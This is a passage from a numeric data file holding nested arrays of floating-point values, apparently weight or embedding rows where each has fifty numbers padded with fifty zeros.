0.0, 0.0], [-0.0785793, 0.656655, -0.0437748, -0.383361, -0.246312, 0.289451, 0.332798, -1.50324, -0.0102523, 0.276219, -0.472762, -0.735907, 0.120646, -0.0371877, -0.0424048, 0.394455, 1.0903, -0.484042, 0.03291, 0.113202, -0.0146975, 0.38649, 0.395473, -0.187295, -0.00428256, -0.70834, -0.485119, -0.221118, 0.0996368, 0.497876, 0.371384, 0.474982, -0.0660763, -1.97237, -0.805604, -0.00967591, 0.522409, -0.131838, 0.0737433, -0.774565, -0.846341, 0.0177552, 0.26113, 0.643962, -0.248758, -0.0270562, -0.0377851, 0.211813, 0.191006, 0.0287498, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.336649, 0.582675, -0.547241, 0.612236, -0.804722, 0.076911, 0.0105915, 0.236957, 0.00479869, 0.882405, 0.36482, -0.627184, 0.0966428, 0.00449299, -0.329954, -1.81632, 0.113273, 1.20684, -0.00426641, 0.118562, 0.0409238, 0.591463, -1.38729, -0.318357, 0.080556, 0.0384083, -0.388941, 0.568035, 0.206238, 0.339593, 0.0747242, -0.0506501, -0.311877, -0.591518, 2.18751, -0.0285278, 0.278364, -0.490317, 0.97008, 0.450659, -1.45557, -0.00643204, 0.24366, 0.213589, -0.28788, 0.0108733, -0.0423052, -0.3664, -0.113991, 0.304281, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.187061, 0.368075, 0.402721, 0.0432532, 0.591196, -0.341224, 0.283519, 0.00788303, -0.00491087, -0.215448, -0.159826, -0.217083, -0.668635, 0.020692, 0.0721342, -0.0762838, 0.469106, -0.712977, 0.0289011, -0.0880809, 0.0445102, -0.547157, -0.0599692, -0.0843311, 0.139699, 0.306879, 0.0446426, -0.0265966, -0.0781866, -0.277161, -0.217242, -0.193597, 0.250581, -0.130119, 1.06178, 0.0564953, 0.531418, -0.290363, 0.628557, 0.0690643, -0.484076, -0.0311047, 0.764387, -0.0655707, -0.0112397, -0.0260667, 0.0109074, 0.683062, 0.0233097, -0.317873, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.128827, 0.539061, 0.0477117, 0.329448, -0.173768, 0.432161, -0.861211, -0.104342, 0.0470841, -1.22939, -1.09594, -0.871845, 0.0729053, 0.0233787, -0.896199, 
0.830081, -0.418109, -0.461961, 0.0437496, 0.74729, -0.0150529, 0.186476, 0.985325, -0.186247, 0.167154, 0.1453, -0.0598934, 0.713923, 0.0744902, 0.238308, -0.997695, -0.173058, 0.405312, -0.556357, 1.37117, 0.0191262, -0.308385, 0.15783, 1.31513, 0.365477, -6.19472, 4.5306e-05, -0.160771, -0.26761, 0.392842, -0.0465553, 0.0244071, 0.192473, 0.148322, -0.283001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.0955, 1.06141, 0.775136, 0.0500249, 0.2557, -0.420256, -0.62232, 0.437431, 0.0340021, 0.404638, 0.442831, 1.18903, 0.5981, 0.0056831, 0.0524798, 0.240292, -0.324635, 0.793153, 0.0213524, 0.131455, -0.00033942, -0.696461, -0.138679, 0.984568, -0.0206788, 0.20673, -0.157852, -0.54439, 0.626833, -0.244234, 0.116795, -0.299775, 0.913311, 0.668854, -0.661695, 0.037665, 0.0409673, 0.0382783, 0.689162, 0.168678, 0.187331, 0.0320525, 0.000326555, -0.367406, -0.71026, -0.0273826, 0.0195486, 0.719728, 0.065834, -0.0104509, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.15697, 1.2807, 0.216626, -2.21813, -1.40401, -0.724192, 0.207941, 0.422454, 0.0407849, -1.31081, -3.83068, -4.68372, -5.41868, -0.0459739, -0.0246873, -0.110887, 0.0631534, 0.875744, -0.0304091, 0.16902, 0.00953614, 0.141132, 0.155546, -0.289232, -0.00695966, 0.15113, 0.935561, -0.159879, 0.177744, 0.000598769, -1.2286, 0.286781, 0.65619, -1.09572, -0.95041, -0.0255265, 0.58012, 0.042113, 0.785399, 0.133714, -0.43335, 0.000392373, 0.541993, 0.14331, 0.971585, -0.00959936, -0.0266763, -4.33728, -0.3051, -0.0873396, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.244738, -0.196512, 0.397359, -0.0485348, -1.32869, 0.144963, 0.239849, 0.424593, 0.0493175, -0.0453742, 0.0202106, 0.354312, -0.419771, -0.0285839, -0.0905183, 0.105743, -0.066927, -0.197359, 0.0126538, -0.199059, -0.000937175, -0.37787, -0.117616, -0.0707187, 0.095812, 0.414536, 0.219019, -0.29525, -0.157299, -0.2223, -0.138491, -0.0366178, 0.352021, 0.207227, 0.873583, 0.0410201, 0.156992, -0.135961, 0.173648, -0.548074, -0.111317, -0.0507218, 0.00123618, -0.136681, -0.0703295, -0.00258926, 0.0398867, 1.55645, -0.117505, -0.0437594, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0497862, 0.0435227, -0.0386273, 0.020912, 0.0219009, -0.0229396, -0.0134445, -0.0167988, 0.0459024, -0.0496992, -0.0487329, -0.00741481, -0.0225579, -0.0115603, 0.0233811, -0.00403145, -0.0030833, -0.022211, -0.0152924, -0.0444175, 0.0455997, -0.0414906, -0.0322587, -0.0460335, -0.0373264, -0.0220059, -0.0186788, -0.0334518, -0.0273248, 0.00613856, 0.0278506, -0.045371, -0.0363645, -0.0417711, 0.0257293, -0.044696, 0.0421258, 0.039697, -0.0346385, 0.0367138, 0.0186013, -0.00180238, 0.0116125, -0.0370684, -0.0394582, -0.0260946, 0.0371131, 0.0260805, 0.0232208, -0.0249248, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.347322, -0.731373, 0.920001, -0.546438, -0.183528, -0.205864, -1.04673, 0.244728, -0.00455609, -0.41089, -0.377605, 0.0715986, 1.22834, 0.0152072, 0.61723, -0.30643, 0.195723, -0.331579, 0.0382495, 
0.177771, -0.0344587, 0.48378, 1.32859, -0.185908, -0.022025, -0.730959, 0.280518, -0.00288165, -0.0245441, -0.173674, -0.240854, -0.246401, -0.0242383, -0.0893153, 0.388881, 0.0279071, 0.58997, 0.345775, 0.0556246, -0.24366, -0.132058, 0.0248003, 0.522833, 0.27646, -0.275803, 0.0393865, 0.00958102, -0.35121, 0.20508, 0.0334523, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.102778, -0.144084, -0.0255408, -0.0694006, 0.597415, 0.0178127, -0.457013, -0.693316, 0.0168571, -0.387994, -0.0322543, -0.26452, -0.185211, -0.0232095, 0.217817, -0.545474, 0.289732, -0.999481, 0.0336787, 0.255047, 0.00241457, 0.340488, 0.688666, 0.0742035, 0.00369556, 0.452634, -0.00240148, -0.21517, 0.203332, 0.40372, -0.175661, 0.0490156, -0.468339, 0.673909, -2.02232, 0.00822716, 0.320597, -0.469309, 0.325946, -0.355309, 0.638437, -0.0097445, 0.304382, 0.301432, -0.737027, 0.0326333, 0.0400533, -1.67222, -0.217986, -0.0174546, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.165099, -0.448869, 0.0304884, 0.259594, 0.0528963, -0.11761, -0.806309, 0.533244, -0.0409291, -0.468568, 0.300563, -0.415004, 1.06198, -0.0389055, -0.163219, 0.231731, -0.0836972, -0.0398799, -0.000119452, 0.434045, 0.0282674, 1.04261, 0.0605663, 0.28312, -0.00196736, 0.25906, -0.280295, -0.434107, -0.0851982, 0.439024, 0.143247, 0.287579, -0.283536, 0.462034, -0.682226, 0.00415039, 0.643868, 0.0155157, 0.197235, 0.64925, -0.63204, 0.00151188, -0.328364, -0.147557, -0.0365489, 0.0068099, 0.0311527, -1.14938, -0.821776, -0.664148, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0421204, 0.0508308, 0.0227831, 0.242589, -0.0987932, 0.0696135, -0.379262, -0.297804, 0.0206691, -0.320476, -0.14999, 0.237486, 0.0145184, -0.0212497, -0.0281091, -0.214931, 0.187985, 0.47702, -0.0102312, 0.113772, -0.029721, -0.343021, -0.285966, -0.128818, 0.143064, -0.185982, -0.0622983, -0.293839, 0.00923924, -0.0624027, -0.167353, -0.00996726, 0.58715, -0.2385, -0.490625, -0.00697588, -0.242208, 0.116544, 0.318555, -0.0830264, -0.12998, 0.0203683, -0.116774, 0.0976717, 0.263925, 0.00527523, 0.0246692, 0.264439, -0.260266, -0.105161, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.014906, 0.0232007, -0.0421895, 0.00229284, 0.0192415, 0.00101475, -0.037026, -0.0210529, -0.0492675, 0.027691, -0.0352615, 0.0360088, 0.0183332, -0.0209571, 0.0155321, -0.0452339, -0.0014726, 0.00271982, -0.043623, -0.05214, -0.00651164, -0.0313214, -0.0233647, -0.0550527, -0.0451922, 0.002555, -0.0490179, 0.0120124, -0.0552485, -0.0122098, 0.0403779, -0.0490645, 0.0188405, -0.0415989, 0.0475779, 0.0327441, 0.0172664, -0.0052262, 0.0333664, 0.0244404, 0.0450005, 0.0284483, -0.0106163, -0.0174149, -0.0451442, 0.00603611, -0.0429305, 0.018425, -0.0382688, -0.0259022, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.120012, -0.239937, 0.482217, 0.719209, -0.296448, -0.396529, 0.0388696, -0.0713034, -0.0211136, 0.0875739, -0.0177673, 0.132792, -0.0545189, -0.00980334, -0.310505, 0.59264, -0.186393, 0.328743, 0.0415384, 
-0.00979186, 0.041988, 0.159757, 0.210988, -0.0138613, -0.0331991, -0.0399854, 0.523528, 0.104616, 0.15978, -0.0583307, -0.204347, -0.184642, -0.0916539, 0.249763, -1.15255, 0.0387355, -0.146595, -0.0564492, -0.197494, -0.0501543, 0.118834, 0.0408129, -0.0927442, 0.181708, -0.123428, 0.000476206, -0.0307574, 0.392281, 0.257402, -0.0499875, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.112557, 0.0197274, 0.700642, 0.183221, -0.665623, -0.640259, -1.68136, 1.52724, 0.0262252, -0.435643, -0.0611323, 1.33106, -0.621827, -0.0177039, 0.414786, -0.0890711, -0.931589, -0.627157, -0.0365978, -0.449838, 0.0257274, 0.185007, 0.192847, -0.0730913, -0.0409926, -0.0106481, 0.904727, 0.167239, -0.0691091, -1.14248, -0.804827, 0.0573134, 0.32731, 0.689998, 0.0510679, 0.00354496, -0.185015, -0.0815219, -0.137485, -0.894445, 1.50434, -0.0163807, -0.0045482, -0.626803, 0.155801, -0.0497264, -0.0286393, -0.612893, 0.771677, 1.02813, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0104661, -0.57479, -0.349557, -0.163706, -0.386321, 0.286461, -0.563309, 0.719485, 0.037069, -0.324657, 0.052107, -0.0138602, 0.460887, -0.0547167, -0.464994, 0.188661, -0.212769, -0.652777, -0.0394646, 0.194121, -0.0467133, 0.386147, 0.46492, -0.0784183, -0.0347684, 0.354735, -0.355225, 0.340553, -0.209908, -0.00553827, 0.361767, 0.692941, -0.408353, -0.266632, -0.405946, -0.00647409, 0.277956, 0.650823, -0.435032, -0.0354302, 0.674537, -0.00481483, 0.46653, -0.0952742, 0.091073, 0.0344903, 0.0542764, -0.214096, -0.000226258, 0.529179, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.152818, 0.336836, 0.144301, -0.60173, -2.1598, 1.15333, -1.25077, -1.80169, 0.0470879, 0.915706, -0.75947, -1.01605, -0.517285, 0.0115814, 0.557733, 0.762249, 1.49474, -0.517578, 0.0054294, 0.0694014, -0.0479392, -0.58181, -0.543352, -0.27979, 0.0698662, -0.911295, -0.824071, -0.213848, -0.0859593, 0.312886, -0.719552, 0.0437872, -0.588228, -2.13608, 0.300612, -0.00355992, 0.0331123, -0.429713, -0.408712, 0.308681, -0.583358, -0.0309197, 0.705046, 0.499835, -0.397074, 0.0182716, 0.010489, -0.113226, 0.525577, -0.926685, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.664345, 0.918003, 0.364648, 1.06381, 0.444586, 0.646712, -0.646267, 1.26364, 0.00775087, -1.74571, -0.199117, 1.48701, 0.312847, -0.0239272, 1.09808, 0.00431516, -0.0290235, 1.31588, -0.00076269, 0.201039, -0.00782709, 0.477719, 1.27135, -0.0945048, 0.0955153, 0.288933, -0.1991, 0.117478, -0.535567, -0.10504, 1.03552, -0.126115, -0.495199, 0.869573, -1.76373, -0.0466754, 0.793781, -0.12449, 1.48639, -0.676636, -2.09958, 0.000330048, -0.0823006, -0.239568, 0.927832, 0.032622, 0.00639042, 0.62815, 0.59099, 0.464836, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.371656, 0.0729074, -0.15079, 0.086222, -0.258871, 0.0568565, -0.201894, 0.0748844, -0.0399964, -0.0180527, -0.0652496, 0.181679, 0.118906, -0.0099284, -0.0124305, 0.174161, -0.151265, 0.481326, -0.0245537, 0.188708, -0.016705, 0.40055, 0.0494264, 
0.508403, 0.00968129, 0.152474, -0.133777, 0.510712, 0.639419, 0.0504993, 0.119014, -0.250586, 0.342326, -0.354039, 1.09073, 0.0219339, 0.0587251, 0.0625257, 0.367626, -0.270117, -0.447799, -0.0382394, -0.406174, -0.00297169, 0.434272, -0.0252771, -0.0293484, -0.580727, -0.117415, -0.0341489, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.097957, -0.108667, 0.173487, 0.0262305, -0.67184, 1.57681, 0.163901, -0.134677, 0.0296796, -0.317427, -0.0970607, -0.583567, 0.571512, -0.00473082, -0.628496, 0.988523, 0.376362, -0.656828, -0.0267865, 0.602271, 0.0274699, 1.18114, 1.60969, -0.106471, 0.0349525, 1.12613, -0.726539, 0.347225, -0.145112, 1.41626, 0.189626, 0.299199, 0.00311092, -0.431197, -0.905033, 0.0275515, 0.349774, 0.143755, 0.00058625, 0.919095, -0.891115, -0.0350427, 0.02246, 0.707076, -0.0767925, -0.00899226, -0.0434743, -0.151372, -0.633945, -0.596201, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.79254, -0.53108, -0.355535, 0.490386, 0.149727, -0.252135, -0.00674967, 0.970254, 0.0293762, -0.925135, 0.320923, 1.16313, -0.253996, 0.00211817, -0.89504, -0.29809, -0.581007, 0.130587, -0.0253456, 0.0581313, 0.00306063, 0.674935, -0.665225, -0.472059, -0.0179954, -0.765101, -0.0796857, 0.0547511, 0.141723, 0.418252, 0.02975, 0.232487, -0.734614, 0.858747, -2.34432, 0.003939, 0.111983, 0.326839, -0.0936272, 0.0250145, -0.150727, -0.0223693, -0.548725, -0.495037, 0.28183, 0.0101745, -0.000659784, 0.937062, -0.224708, 0.40149, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.995124, -0.479951, -0.605316, -0.0854287, -0.927684, 0.113679, -0.516473, -0.392544, 0.0181165, -0.472579, -0.523514, -0.492673, 0.42592, -0.050793, 0.484923, 0.517631, -0.00440341, 0.165548, 0.029631, -0.306851, -0.044285, -0.80855, -0.861889, 0.275118, 0.0120566, -0.236852, -0.539186, 0.280588, 0.320842, -0.40198, -0.35291, -0.330626, 0.299637, 0.117169, 0.0743303, 0.0234753, -0.197718, 0.0994273, 0.147637, -0.648323, 0.78347, 0.0106761, -0.212044, -0.191767, 0.055786, -0.0136898, -0.0193105, -0.854537, 0.65414, 0.0360536, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.946175, 0.663142, 0.123494, -0.0025984, 0.183861, -0.248596, 0.406707, 0.846746, -0.0456627, -0.805682, 0.336541, 0.514174, 1.13627, 0.0140341, 0.178093, -0.857201, -0.41955, 0.0258105, -0.015725, 0.372254, 0.0378651, -0.996768, 0.0865944, -0.468885, -0.0104388, 0.275206, 0.0881984, 0.290413, -0.0762469, -0.405834, 1.20486, 0.0652548, 0.523827, 0.508187, -3.4686, -0.0199247, 0.051613, 0.441094, -0.345916, 0.0337958, 0.479906, -0.0355347, -1.04343, -0.472257, -0.522299, 0.00932301, -0.0502567, 1.32858, 0.428189, 0.583258, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.450054, 0.140606, -0.2783, -0.300913, -0.578471, -0.0575203, 0.055184, 0.00346404, 0.0312428, 0.221119, 0.0712621, -0.407903, -0.217463, 0.018883, -0.17991, -0.27029, 0.13348, 0.22478, -0.0394242, -0.0571733, 0.0180931, 0.140644, 0.260784, 0.222296, 0.101704, 0.198339, 0.0819407, 0.0943845, -0.429599, 
-0.198418, -0.42386, -0.0961622, -0.0332791, -0.0615376, 0.559515, 0.0214343, 0.155784, -0.0713667, 0.204222, 0.0536225, -0.020165, -0.0489411, 0.0292133, -0.136512, 0.410923, 0.0283761, -0.0498177, -0.77216, -0.180451, -0.0889349, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.312342, -0.391429, 0.261905, -0.00645419, -0.242703, 0.0820002, 0.159221, 0.285375, -0.0174987, -0.27332, -0.0317259, 0.136816, 0.42158, 0.0151467, -0.0565131, -0.0695457, -0.0377536, -0.148152, -0.0434048, 0.0920293, 0.0196925, 0.353066, -0.0751582, 0.0609769, 0.136909, -0.006616, -0.109592, 0.333964, 0.343872, 0.0392573, 0.325558, 0.0643591, 0.620381, 0.0757577, 0.608915, 0.0309398, 0.229132, 0.118142, 0.085838, -0.546848, 0.12081, 0.00212243, -0.237015, -0.00165503, 0.0594733, 0.0251471, 0.00469006, -0.66407, -0.0412096, 0.151258, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00869809, 0.0167576, -0.0706604, -0.0665272, 0.0179907, -0.0256223, 0.00635455, -0.0367019, 0.0354537, -0.0376332, 0.00509622, -0.0446084, 0.0165623, -0.00771416, 0.0401489, -0.017129, -0.0601624, 0.0353441, -0.0383042, -0.0198847, -0.0147165, 0.0344525, 0.0304548, -0.0477699, -0.0487352, 0.0259926, -0.0317255, -0.0609617, -0.00637658, -0.0292192, -0.0121426, -0.0275772, 0.0217314, 0.037275, 0.0147684, 0.0319494, 0.0141303, -0.0122977, 0.00516398, -0.0399522, -0.0238073, -0.0214366, -0.0204699, 0.0414033, -0.0390457, 0.00189087, -0.0235861, -0.0397219, -0.0321911, -0.00870085, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
